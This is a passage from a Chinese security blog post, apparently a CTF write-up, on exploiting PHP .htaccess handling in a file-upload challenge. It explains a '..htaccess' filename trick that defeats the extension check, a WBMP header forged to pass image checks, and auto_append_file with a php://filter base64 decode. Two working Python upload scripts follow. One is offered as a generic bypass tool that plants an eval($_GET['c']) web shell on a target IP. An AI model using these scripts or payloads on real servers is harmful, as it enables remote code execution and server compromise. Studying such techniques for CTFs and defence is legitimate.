<li><div class="hljs code-wrapper"><pre><code class="php">7.0.0   The ASP tags &lt;%, %&gt;, &lt;%=, and the script tag &lt;script language=&quot;php&quot;&gt; are removed from PHP.
5.4.0   The tag &lt;?= is always available regardless of the short_open_tag ini setting.
<pre><code class="hljs awk">
  - 如果能够控制文件名开头可以通过伪协议绕过：`php:<span class="hljs-regexp">//</span>filter` 等

- 文件要通过`exif_imagetype`的检查

  - 只检查文件头

- 图片的height和width要是<span class="hljs-number">1337</span>



我们需要上传.htaccess但是如下代码会进行后缀提取

```php
    <span class="hljs-variable">$parts</span> = explode(<span class="hljs-string">&quot;.&quot;</span>, <span class="hljs-variable">$name</span>);
    <span class="hljs-variable">$ext</span> = array_pop(<span class="hljs-variable">$parts</span>);</code></pre></div>


</code></pre>
</li>
</ul>
</li>
</ul>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/20190122212825-98708d30-1e49-1.png" alt="img"></p>
<p>但是后面的代码使得我们可以绕过</p>
<div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$parts</span>[<span class="hljs-number">0</span>])) &#123;
        array_shift(<span class="hljs-variable">$parts</span>);
    &#125;</code></pre></div>



<p><strong>array_shift()</strong> 将 <code>array</code> 的第一个单元移出并作为结果返回，将 <code>array</code> 的长度减一并将所有其它单元向前移动一位。所有的数字键名将改为从零开始计数，文字键名将不变。</p>
<p>filename 为..htaccess即可绕过</p>
<p>下一步是考虑.htaccess文件的内容</p>
<ul>
<li>exif_imagetype() 支持的magic number</li>
<li><code>AddType application/x-httpd-php .wuwu</code></li>
<li>还要能正确解析</li>
</ul>
<p>之前提到以0x00也是可以当做注释的。所以可以中找找以0x00开头的图片</p>
<p><a target="_blank" rel="noopener" href="https://github.com/php/php-src/blob/e219ec144ef6682b71e135fd18654ee1bb4676b4/ext/standard/image.c">https://github.com/php/php-src/blob/e219ec144ef6682b71e135fd18654ee1bb4676b4/ext/standard/image.c</a></p>
<p>php源码中对于图片头的检查如下：</p>
<div class="hljs code-wrapper"><pre><code class="hljs c">PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_gif[<span class="hljs-number">3</span>] = &#123;<span class="hljs-string">&#x27;G&#x27;</span>, <span class="hljs-string">&#x27;I&#x27;</span>, <span class="hljs-string">&#x27;F&#x27;</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_psd[<span class="hljs-number">4</span>] = &#123;<span class="hljs-string">&#x27;8&#x27;</span>, <span class="hljs-string">&#x27;B&#x27;</span>, <span class="hljs-string">&#x27;P&#x27;</span>, <span class="hljs-string">&#x27;S&#x27;</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_bmp[<span class="hljs-number">2</span>] = &#123;<span class="hljs-string">&#x27;B&#x27;</span>, <span class="hljs-string">&#x27;M&#x27;</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_swf[<span class="hljs-number">3</span>] = &#123;<span class="hljs-string">&#x27;F&#x27;</span>, <span class="hljs-string">&#x27;W&#x27;</span>, <span class="hljs-string">&#x27;S&#x27;</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_swc[<span class="hljs-number">3</span>] = &#123;<span class="hljs-string">&#x27;C&#x27;</span>, <span class="hljs-string">&#x27;W&#x27;</span>, <span class="hljs-string">&#x27;S&#x27;</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_jpg[<span class="hljs-number">3</span>] = &#123;(<span class="hljs-keyword">char</span>) <span class="hljs-number">0xff</span>, (<span class="hljs-keyword">char</span>) <span class="hljs-number">0xd8</span>, (<span class="hljs-keyword">char</span>) <span class="hljs-number">0xff</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_png[<span class="hljs-number">8</span>] = &#123;(<span class="hljs-keyword">char</span>) <span class="hljs-number">0x89</span>, (<span class="hljs-keyword">char</span>) <span class="hljs-number">0x50</span>, (<span class="hljs-keyword">char</span>) <span class="hljs-number">0x4e</span>, (<span class="hljs-keyword">char</span>) <span class="hljs-number">0x47</span>,
                                    (<span class="hljs-keyword">char</span>) <span class="hljs-number">0x0d</span>, (<span class="hljs-keyword">char</span>) <span class="hljs-number">0x0a</span>, (<span class="hljs-keyword">char</span>) <span class="hljs-number">0x1a</span>, (<span class="hljs-keyword">char</span>) <span class="hljs-number">0x0a</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_tif_ii[<span class="hljs-number">4</span>] = &#123;<span class="hljs-string">&#x27;I&#x27;</span>,<span class="hljs-string">&#x27;I&#x27;</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x2A</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x00</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_tif_mm[<span class="hljs-number">4</span>] = &#123;<span class="hljs-string">&#x27;M&#x27;</span>,<span class="hljs-string">&#x27;M&#x27;</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x00</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x2A</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_jpc[<span class="hljs-number">3</span>]  = &#123;(<span class="hljs-keyword">char</span>)<span class="hljs-number">0xff</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x4f</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0xff</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_jp2[<span class="hljs-number">12</span>] = &#123;(<span class="hljs-keyword">char</span>)<span class="hljs-number">0x00</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x00</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x00</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x0c</span>,
                                     (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x6a</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x50</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x20</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x20</span>,
                                     (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x0d</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x0a</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x87</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x0a</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_iff[<span class="hljs-number">4</span>] = &#123;<span class="hljs-string">&#x27;F&#x27;</span>,<span class="hljs-string">&#x27;O&#x27;</span>,<span class="hljs-string">&#x27;R&#x27;</span>,<span class="hljs-string">&#x27;M&#x27;</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_ico[<span class="hljs-number">4</span>] = &#123;(<span class="hljs-keyword">char</span>)<span class="hljs-number">0x00</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x00</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x01</span>, (<span class="hljs-keyword">char</span>)<span class="hljs-number">0x00</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_riff[<span class="hljs-number">4</span>] = &#123;<span class="hljs-string">&#x27;R&#x27;</span>, <span class="hljs-string">&#x27;I&#x27;</span>, <span class="hljs-string">&#x27;F&#x27;</span>, <span class="hljs-string">&#x27;F&#x27;</span>&#125;;
PHPAPI <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> php_sig_webp[<span class="hljs-number">4</span>] = &#123;<span class="hljs-string">&#x27;W&#x27;</span>, <span class="hljs-string">&#x27;E&#x27;</span>, <span class="hljs-string">&#x27;B&#x27;</span>, <span class="hljs-string">&#x27;P&#x27;</span>&#125;;

</code></pre></div>

<p>满足要求的有jp2和ico</p>
<p>但是ico的长度最多是0xff，为1337是0x539</p>
<p>jp2 只修改header不能改变getimagesize的结果</p>
<p>查询到wbmp图像可以</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200914084822368.png" alt="image-20200914084822368"></p>
<p>然后用此链接<a target="_blank" rel="noopener" href="https://image.online-convert.com/convert-to-wbmp%E7%94%9F%E6%88%90%E4%B8%80%E4%B8%AA1337*1337%E5%A4%A7%E5%B0%8F%E7%9A%84%E5%9B%BE%E5%83%8F%EF%BC%8C%E7%84%B6%E5%90%8E%E5%88%A0%E9%99%A4%E5%8F%AA%E7%95%99%6000008A398A39%60">https://image.online-convert.com/convert-to-wbmp生成一个1337*1337大小的图像，然后删除只留`00008A398A39`</a> 这些即可满足type为wbmp长宽高为1337</p>
<div class="hljs code-wrapper"><pre><code class="hljs bash">root@drom-virtual-machine:/home/drom/图片<span class="hljs-comment"># xxd 11.wbmp  | head</span>
00000000: 0000 8a39 8a39 ffff ffff ffff ffff ffff  ...9.9..........
00000010: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000020: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000030: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000040: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000050: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000060: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000070: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000080: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000090: ffff ffff ffff ffff ffff ffff ffff ffff  ................
</code></pre></div>

<p>文件头为0000 8a39 8a39，只留这部分即可</p>
<p>对于不能写&lt;?可以使用php://filter/covert.base64-decode/resource=shell.wuwu</p>
<div class="hljs code-wrapper"><pre><code class="hljs applescript">AddType <span class="hljs-built_in">application</span>/x-httpd-php .wuwu
php_value auto_append_file <span class="hljs-string">&quot;php://filter/convert.base64-decode/resource=/var/www/html/images/1222a98e5b5a6fd81ff8761be852e16e75b18703/shell.wuwu&quot;</span></code></pre></div>



<p>还需要考虑的是在base64decode后能够正常反序列化出语句。</p>
<div class="hljs code-wrapper"><pre><code class="hljs python">shell = <span class="hljs-string">b&quot;\x00\x00\x8a\x39\x8a\x39&quot;</span>+<span class="hljs-string">b&quot;\x39\x39&quot;</span>+ base64.b64encode(<span class="hljs-string">b&quot;&lt;?php phpinfo();?&gt;&quot;</span>)
</code></pre></div>

<p>可以编码的字符为\x39，由于前面只有两个，而base64是4个一组，所以需要再填充两个字符，b”\x39\x39”</p>
<p>payload</p>
<div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests
<span class="hljs-keyword">import</span> base64
url = <span class="hljs-string">&#x27;http://192.168.1.22:8000/index.php&#x27;</span>

php_sessionID = <span class="hljs-string">&quot;tj3kr62k12a7nrj33evue8qkhq&quot;</span>

Cookies = &#123;
    <span class="hljs-string">&#x27;XDEBUG_SESSION&#x27;</span>:<span class="hljs-string">&#x27;XDEBUG_ECLIPSE&#x27;</span>,
    <span class="hljs-string">&#x27;PHPSESSID&#x27;</span>:php_sessionID
&#125;

file_content = <span class="hljs-string">b&quot;&quot;&quot;\x00\x00\x8a\x39\x8a\x39</span>
<span class="hljs-string">AddType application/x-httpd-php .wuwu</span>
<span class="hljs-string">php_value auto_append_file &quot;php://filter/convert.base64-decode/resource=/var/www/html/images/1222a98e5b5a6fd81ff8761be852e16e75b18703/shell.wuwu&quot;</span>
<span class="hljs-string">&quot;&quot;&quot;</span>
<span class="hljs-comment"># php://filter/convert.base64-decode/resource=/var/www/html/images/e694a9e3c406b3d8b247d73836958f6303ed7b72/shell.wuwu</span>
data = &#123;
    <span class="hljs-string">&#x27;upload&#x27;</span>:<span class="hljs-string">&#x27;submit&#x27;</span>
&#125;
shell = <span class="hljs-string">b&quot;\x00\x00\x8a\x39\x8a\x39&quot;</span>+<span class="hljs-string">b&quot;\x39\x39&quot;</span>+ base64.b64encode(<span class="hljs-string">b&quot;&lt;?php phpinfo();?&gt;&quot;</span>)
normal = <span class="hljs-string">b&quot;\x00\x00\x8a\x39\x8a\x39&quot;</span> + <span class="hljs-string">b&quot;&quot;</span>;
files = &#123;
    <span class="hljs-string">&#x27;image&#x27;</span>:(
        <span class="hljs-string">&#x27;shell.wuwu&#x27;</span>,
        shell,
        <span class="hljs-string">&#x27;application/octet-stream&#x27;</span>
    )
&#125;

proxies = &#123;
    <span class="hljs-string">&#x27;http&#x27;</span>:<span class="hljs-string">&#x27;http://127.0.0.1:8080&#x27;</span>
&#125;


s = requests.session()
r = s.post(url,cookies=Cookies,data=data,files=files,proxies=proxies).text
print(r)


<span class="hljs-comment"># images/295be839f519b2a6dac30e8e472ca45856fcb402/</span></code></pre></div>



<p>题目的后半段为绕过disable_function</p>
<h2 id="0x07-利用脚本"><a href="#0x07-利用脚本" class="headerlink" title="0x07 利用脚本"></a>0x07 利用脚本</h2><h3 id="通用上传-文件类型绕过脚本"><a href="#通用上传-文件类型绕过脚本" class="headerlink" title="通用上传+文件类型绕过脚本"></a>通用上传+文件类型绕过脚本</h3><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests
<span class="hljs-keyword">import</span> base64

url = <span class="hljs-string">&quot;http://35.246.234.136/?&quot;</span>

header = &#123;<span class="hljs-string">&quot;Cookie&quot;</span>:<span class="hljs-string">&quot;PHPSESSID=58eshi3a265dguf0icnkc6qk5a&quot;</span>&#125;

<span class="hljs-comment">#这里是使用xxd查看的文件16进制</span>
htaccess = <span class="hljs-string">b&quot;&quot;&quot;\x00\x00\x8a\x39\x8a\x39 </span>
<span class="hljs-string">AddType application/x-httpd-php .wuwu</span>
<span class="hljs-string">php_value auto_append_file &quot;php://filter/convert.base64-decode/resource=/var/www/html/images/e694a9e3c406b3d8b247d73836958f6303ed7b72/shell.wuwu&quot;</span>
<span class="hljs-string">&quot;&quot;&quot;</span>

shell = <span class="hljs-string">b&quot;\x00\x00\x8a\x39\x8a\x39&quot;</span>+<span class="hljs-string">b&quot;00&quot;</span>+ base64.b64encode(<span class="hljs-string">b&quot;&lt;?php eval($_GET[&#x27;c&#x27;]);?&gt;&quot;</span>)

files = [(<span class="hljs-string">&#x27;image&#x27;</span>,(<span class="hljs-string">&#x27;.htaccess&#x27;</span>,htaccess,<span class="hljs-string">&#x27;application/octet-stream&#x27;</span>))]

data = &#123;<span class="hljs-string">&quot;upload&quot;</span>:<span class="hljs-string">&quot;Submit&quot;</span>&#125;

proxies = &#123;<span class="hljs-string">&quot;http&quot;</span>:<span class="hljs-string">&quot;http://127.0.0.1:8080&quot;</span>&#125;
print(<span class="hljs-string">&quot;upload .htaccess&quot;</span>)
r = requests.post(url=url, data=data, files=files,headers=header)<span class="hljs-comment">#proxies=proxies)</span>

<span class="hljs-comment"># print(r.text) </span>

print(<span class="hljs-string">&quot;upload shell.wuwu&quot;</span>)

files = [(<span class="hljs-string">&#x27;image&#x27;</span>,(<span class="hljs-string">&#x27;shell.wuwu&#x27;</span>,shell,<span class="hljs-string">&#x27;application/octet-stream&#x27;</span>))]
r = requests.post(url=url, data=data, files=files,headers=header)</code></pre></div>





<h3 id="php配置弱点检查脚本"><a href="#php配置弱点检查脚本" class="headerlink" title="php配置弱点检查脚本"></a>php配置弱点检查脚本</h3><ul>
<li><a target="_blank" rel="noopener" href="https://github.com/sektioneins/pcc">pcc</a></li>
</ul>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200913083448243.png" alt="image-20200913083448243"></p>
<h2 id="0x08-php安全加固"><a href="#0x08-php安全加固" class="headerlink" title="0x08 php安全加固"></a>0x08 php安全加固</h2><ul>
<li><a target="_blank" rel="noopener" href="https://www.alibabacloud.com/help/zh/faq-detail/50218.htm">PHP环境安全加固</a></li>
</ul>
<h2 id="0x09-工具"><a href="#0x09-工具" class="headerlink" title="0x09 工具"></a>0x09 工具</h2><h3 id="htshell"><a href="#htshell" class="headerlink" title="htshell"></a>htshell</h3><ul>
<li><a target="_blank" rel="noopener" href="https://github.com/wireghoul/htshells">https://github.com/wireghoul/htshells</a></li>
</ul>
<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><ul>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/IT-LM/p/6829209.html">php .htaccess文件使用详解</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.51cto.com/wujianwei/2163907">apache配置rewrite及.htaccess文件</a></li>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/218495.html">Apache中.htaccess文件利用的总结与新思路拓展</a></li>
<li><a target="_blank" rel="noopener" href="https://www.awaimai.com/371.html">CGI、FastCGI和PHP-FPM关系图解</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/wireghoul/htshells">https://github.com/wireghoul/htshells</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/sektioneins/pcc">pcc</a></li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/ini.list.php#ini.list"><em>php.ini 配置选项列表</em></a></li>
</ul>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a>
                    
                      <a class="hover-with-bg" href="/categories/php/">php</a>
                    
                      <a class="hover-with-bg" href="/categories/web%E5%AE%89%E5%85%A8/htaccess/">.htaccess</a>
                    
                      <a class="hover-with-bg" href="/categories/php/htaccess/">.htaccess</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/web%E5%AE%89%E5%85%A8/">web安全</a>
                    
                      <a class="hover-with-bg" href="/tags/ctf/">ctf</a>
                    
                      <a class="hover-with-bg" href="/tags/php/">php</a>
                    
                      <a class="hover-with-bg" href="/tags/htaccess/">.htaccess</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/11/21/phpmyadmin-%E5%90%8E%E5%8F%B0-getshell-%E5%8F%8A%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF%E6%95%B4%E7%90%86/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">phpmyadmin 后台 getshell 及漏洞利用思路整理</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/10/28/linux-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF/">
                        <span class="hidden-mobile">linux 命令执行绕过思路</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    <script type="text/javascript">
      var disqus_config = function() {
        this.page.url = 'https://greydr34d.github.io/2020/10/30/php-htaccess%E5%88%A9%E7%94%A8/';
        this.page.identifier = '/2020/10/30/php-htaccess%E5%88%A9%E7%94%A8/';
      };
      Fluid.utils.waitElementVisible('disqus_thread', function () {
        var d = document, s = d.createElement('script');
        s.src = '//' + '' + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', new Date());
        (d.head || d.body).appendChild(s);
      });
    </script>
    <noscript>Please enable JavaScript to view the
      <a target="_blank" href="https://disqus.com/?ref_noscript" rel="nofollow noopener noopener">comments powered by Disqus.</a>
    </noscript>
  </div>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->




  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
